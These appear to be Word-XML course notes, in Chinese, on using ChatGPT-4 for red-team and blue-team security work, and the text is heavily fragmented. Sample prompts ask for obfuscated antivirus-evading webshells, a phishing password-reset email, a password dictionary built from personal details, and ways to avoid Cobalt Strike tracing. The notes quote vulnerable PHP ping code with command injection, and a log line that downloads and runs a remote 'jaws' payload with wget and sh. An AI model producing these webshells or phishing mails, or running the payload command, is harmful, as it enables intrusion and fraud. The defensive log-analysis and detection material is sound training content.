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E2C1" w14:textId="77777777" w:rsidR="00E24503" w:rsidRDefault="00E24503" w:rsidP="00E24503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1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>基础入门-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ChatGPT4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>篇</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>注册升级</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>专业接口</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>结合红蓝队</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&amp;Ai</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>工具插件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>高效赋能需求</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4258A62F" w14:textId="304D4951" w:rsidR="00E24503" w:rsidRDefault="00E24503" w:rsidP="00E24503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DBC7FF6" wp14:editId="28145D55">
            <wp:extent cx="5274310" cy="1049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2905" w14:textId="77777777" w:rsidR="00E24503" w:rsidRDefault="00E24503" w:rsidP="00E24503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解析上的技术要点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搭建架构上的技术要点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源码类别上的技术要点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防护产品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保护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节点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文件托管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-OSS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通讯服务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反向代理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运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维安全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负载均衡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蜜罐系统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堡垒机运维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第三方拓展架构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开发架构安全问题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开发架构安全问题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s-Burp&amp;Yakit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s-Burp&amp;Yakit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s-Burp&amp;Yakit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s-Burp&amp;Yakit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软件联动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Proxifier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通用方案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ReqableApi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其他工具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s-Fiddler&amp;Charles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双层代理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扶墙环境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上游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下游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项目联动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WireShark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科来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、数据不回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显原因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和解决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带外延迟反弹写文件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、数据不出网原因和解决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出入站策略正反向连接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语言等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、系统渗透命令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、传输格式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、密码存储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混淆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不可逆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非对称性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、算法类型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单向散列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对称性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非对称性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、算法识别加解密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-MD5&amp;AES&amp;DES&amp;RSA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、解密条件寻找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逻辑特征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源码中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、请求头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返回包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头修改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状态码等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、数据包分析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红队攻击工具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蓝队流量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研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、数据包构造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Reqable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自定义添加修改请求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、网站协议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-http/https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安全差异（抓包）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、身份鉴权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&amp;OAuth2&amp;JWT&amp;Token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赋能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结合安全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-ChatGPT4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升级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赋能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结合安全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-ChatGPT4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专业接口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安全插件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架构，小程序架构，前后端分离，容器技术，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云产品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数据加解密算法，数据包抓取，数据包解析，正反向网络通讯，内外网通讯，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防火墙出入站，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Windows&amp;Linux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渗透命令，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产品，负载均衡，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加壳保护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WEB,APP,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前后端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容器化等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云数据库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负载均衡等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网络：不回显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防火墙出入站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内外网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正反向连接等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MD5,Base64,AES,DES,Salt,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自定义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代码加密算法等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命令：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Windows&amp;Linux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网络查看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反弹权限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权限设置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加壳加密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反调试等</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47EE9DC0" w14:textId="77777777" w:rsidR="00E24503" w:rsidRDefault="00E24503" w:rsidP="00E24503">
      <w:pPr>
        <w:pStyle w:val="paragraph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2826AF09" w14:textId="77777777" w:rsidR="00E24503" w:rsidRDefault="00E24503" w:rsidP="00E2450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ChatGPT4-注册&amp;使用&amp;升级</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F15AF67" w14:textId="77777777" w:rsidR="00E24503" w:rsidRDefault="00E24503" w:rsidP="00E2450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ChatGPT4-专业接口&amp;安全插件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF6F908" w14:textId="77777777" w:rsidR="00E24503" w:rsidRDefault="00E24503" w:rsidP="00E24503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#Chatgpt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大概科普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ChatGPT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是什么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ChatGPT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可能很多人被这个缩写的名字搞糊涂了，第一眼无法看出到底什么意思，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GPT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的英文原文是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Generative Pre-training Transformer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预训练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生成模型），业界有人将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ChatGPT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概括为聊天机器人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搜索工具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文本创造工具的组合，或者简单理解它是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一个生成式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（内容生成器）。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ChatGPT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能做什么？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它的主要功能是协助回答问题、提供信息和生成有关历史、科学、地理等各种主题的信息，这些信息仅限于它所接受的训练，但其知识在不断扩展。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ChatGPT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牛在哪里？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）它是个通用的模型，只要提示词引导，就能快速适应不同领域。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）它能理解你的问题，只要给的引导越多，它就能给出你想要的答案。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安全行业影响：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）整合多种恶意软件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）提升漏洞发现能力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）给新手攻击者赋能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）便于社会工程学攻击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）快速筛选和锁定目标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）模拟网络防御攻击技术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官网：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https://chatgpt.com/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国内镜像站：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rawchat.cn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（打不开用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sharedchat.top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注册购买：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https://github.com/anyofai/anyofai.github.io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https://share.mosha.cloud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https://hello.zhangsan.shop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https://hello.aiforme.cloud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专业接口：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https://github.com/taranjeet/awesome-GPTs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https://github.com/fr0gger/Awesome-GPT-Agents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工具插件：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https://mp.weixin.qq.com/s/crfqpa_KqK6wR62N5gnVgQ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常规利用：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红队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逆向免杀，红队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，代码审计，安全开发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安全开发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、如何使用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Python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写一个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爆破脚本？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、如何使用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Python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写一个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Webshell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检测脚本？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、如何使用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Python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写一个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MS17010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漏洞检测脚本？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一个免杀混淆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复杂的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webshell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脚本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4.1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、在渗透测试靶机中，发现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脚本被禁用了敏感函数，如何生成一个绕过的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webshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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-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逆向免杀</w:t>
      </w:r>
      <w:proofErr w:type="gram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使用什么工具进行反编译？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、常见脱壳工具有那些？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免杀中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使用什么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加壳效果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好？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、下面代码会出现哪些安全漏洞？又该如何利用呢？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&lt;?php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if(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isset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( $_POST[ 'Submit' ]  ) )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// Get input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$target = $_REQUEST[ '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' ];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// Determine OS and execute the ping command.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if(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stristr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(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php_uname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( 's' ), 'Windows NT' ) )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// Windows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$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cmd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shell_exec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( 'ping  ' . $target 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else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// *nix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$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cmd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shell_exec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( 'ping  -c 4 ' . $target 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}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// Feedback for the end user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$html .= "&lt;pre&gt;{$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cmd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}&lt;/pre&gt;";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Thinkphp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历史漏洞有哪些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shiro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反序列化漏洞如何利用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社工学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、防溯源：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Cobaltstike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如何防止被溯源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、钓鱼邮件：由于系统升级，公司通知员工必须修改自己的密码，请在新业务网站上进行修改，帮我写一份规范的邮件通知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、字典生成：用户名：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xiaodi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电话：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13512345678 QQ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471656814 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蓝队：应急响应，日志分析，流量检测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、平台项目：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蓝队针对攻击威胁感知平台项目有哪些？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、日志分析：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103.178.229.152 - - [12/Mar/2023:07:16:02 +0800] "GET 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shell?cd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+/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tmp;rm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+-rf+*;wget+128.199.134.42/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jaws;sh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+/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tmp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/jaws HTTP/1.1" 404 146 "-" "Hello, world"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、流量检测：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写一个检测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cobaltstrike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的脚本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写一个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Cobalstrike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rules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规则</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76BC700F" w14:textId="77777777" w:rsidR="00E24503" w:rsidRDefault="00E24503" w:rsidP="00E24503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6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0048001C" w14:textId="77777777" w:rsidR="00A8100D" w:rsidRPr="00E24503" w:rsidRDefault="00A8100D"/>
    <w:sectPr w:rsidR="00A8100D" w:rsidRPr="00E24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E2999"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="06FE81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ED"/>
    <w:rsid w:val="003854ED"/>
    <w:rsid w:val="00A8100D"/>
    <w:rsid w:val="00E2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67826-CB5A-4BC6-850F-B36E7425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E24503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245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450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450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245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0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2024-12-09T03:49:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-12-09T03:49:00Z</dcterms:modified>
</cp:coreProperties>
</file>